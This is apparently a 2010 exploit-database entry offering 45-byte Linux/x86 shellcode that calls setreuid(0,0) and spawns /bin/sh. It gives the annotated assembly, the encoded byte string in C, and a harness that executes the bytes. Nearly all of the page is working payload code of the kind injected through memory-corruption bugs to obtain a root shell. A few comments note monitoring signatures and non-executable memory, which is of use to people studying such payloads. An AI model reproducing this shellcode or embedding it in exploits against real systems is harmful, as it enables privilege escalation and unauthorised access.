
linux/x86 execute /bin/sh with setreuid 0,0 45 Bytes

🗓️ 17 Jun 2010 00:00:00Reported by gunslinger_Type 
zdt
 zdt
🔗 0day.today👁 34 Views

A 45-byte Linux/x86 (32-bit, int 0x80) shellcode that calls setreuid(0, 0) and then executes /bin/sh.

Code
====================================================
linux/x86 execute /bin/sh with setreuid 0,0 45 Bytes
====================================================


/*
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
Title  : execute /bin/sh with setreuid 0,0
Name   : 45 bytes sys_setreuid (0,0) - sys_execve("/bin/sh","","")
Date   : Thu Jun 17 16:58:40 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : http://gunslingerc0de.wordpress.com
tested on : linux debian
special thanks to : r0073r (inj3ct0r.com), d3hydr8 (darkc0de.com), ty miller (projectshellcode.com), jonathan salwan(shell-storm.org), mywisdom (devilzc0de.org)
greetz : jasakom.com , devilzc0de.org - com , xc0de.or.id, yogyacarderlink.web.id, serverisdown.org
tested on : linux debian
---------------------------Original assembly-----------------------------
; Syntax : NASM / Intel (dst, src)
; Target : 32-bit Linux, int 0x80 system-call interface
;          (eax = syscall number, ebx/ecx/edx = arguments 1..3)
; Flow   : setreuid(0, 0) -> execve("/bin/sh", 0, 0) -> exit() if execve returns.
;          The address of the path string is obtained with the jmp/call/pop
;          pattern, so the code contains no absolute address.
; Observable behaviour for monitoring: syscall 70 with both arguments zero,
; immediately followed by syscall 11 on "/bin/sh" from the same task.
global _start

_start:
	xor eax, eax	; zero the four registers used below
	xor edx, edx	; edx stays 0 for the whole payload (third execve argument)
	xor ebx, ebx	;
	xor ecx, ecx	;
	
        mov al, 70     	; eax = 70 = sys_setreuid
        add bl,1        ; bl = 1 ...
        dec bl     	; ... and back to 0: ebx (ruid) = 0; net effect on ebx is nil
	mov cl,bl	; cl = 0, so ecx (euid) = 0 -> setreuid(0, 0)
        int 0x80	; issue the system call; the result comes back in eax

        jmp short end	; jump forward to the call, which pushes the string address
			;
	start:		; reached via "call start"; top of stack = address of '/bin/sh'
	mov al,11	; low byte of eax = 11 (sys_execve). Only al is written: the upper bytes
			; still hold the setreuid result, so eax is 11 only when that call returned 0.
	pop ebx		; ebx = return address pushed by call = pointer to '/bin/sh'
	mov ecx, edx	; ecx = 0 (second argument); edx is still 0 -> execve("/bin/sh", 0, 0)
	int 0x80	; issue the system call; does not return on success
			;
	xor eax, eax	; only reached if the previous system call returned: eax = 0
	inc eax		; eax = 1 = sys_exit
	int 0x80	; exit with whatever value ebx holds at this point
			;
	end:		; target of "jmp short end"
	call start	; pushes the address of the next byte (the string) and jumps back to start
	db '/bin/sh'	; 7 path bytes emitted inline after the call (not on the stack); no terminating
			; zero byte is emitted, so the path ends at the first zero byte that follows in memory

------------------------Eof Original assembly-----------------------------
*/
#include <stdio.h>
#include <string.h>

char *shellcode=
		"\x31\xc0"                    /* xor    %eax,%eax */
		"\x31\xd2"                    /* xor    %edx,%edx */
		"\x31\xdb"                    /* xor    %ebx,%ebx */
		"\x31\xc9"                    /* xor    %ecx,%ecx */
		"\xb0\x46"                    /* mov    $0x46,%al */
		"\x80\xc3\x01"                /* add    $0x1,%bl */
		"\xfe\xcb"                    /* dec    %bl */
		"\x88\xd9"                    /* mov    %bl,%cl */
		"\xcd\x80"                    /* int    $0x80 */
		"\xeb\x0c"                    /* jmp    0x8048081 */
		"\xb0\x0b"                    /* mov    $0xb,%al */
		"\x5b"                        /* pop    %ebx */
		"\x89\xd1"                    /* mov    %edx,%ecx */
		"\xcd\x80"                    /* int    $0x80 */
		"\x31\xc0"                    /* xor    %eax,%eax */
		"\x40"                        /* inc    %eax */
		"\xcd\x80"                    /* int    $0x80 */
		"\xe8\xef\xff\xff\xff"        /* call   0x8048075 */
		"\x2f"                        /* das     */
		"\x62\x69\x6e"                /* bound  %ebp,0x6e(%ecx) */
		"\x2f"                        /* das     */
		"\x73\x68";                   /* jae    0x80480f5 */

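/*
 * Test harness: prints the payload length, then calls the byte array as if
 * it were a function taking no arguments.
 *
 * The call target is a string literal, i.e. a data object. Where data pages
 * are mapped non-executable (NX / W^X), the indirect call typically faults
 * instead of running the bytes.
 *
 * Returns 0 only if control ever comes back from the call.
 */
int main(void)
{
		/*
		 * strlen() returns size_t, so it is cast to unsigned long and
		 * printed with %lu; passing it to %d is undefined where size_t is
		 * wider than int. The count is exact because the payload contains
		 * no 0x00 byte before the literal's terminator.
		 */
		fprintf(stdout,"Length: %lu\n",(unsigned long)strlen(shellcode));
		/* Reinterpret the data pointer as void (*)(void) and call it. */
		((void (*)(void)) shellcode)();
		return 0;
}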



#  0day.today [2018-02-17]  #
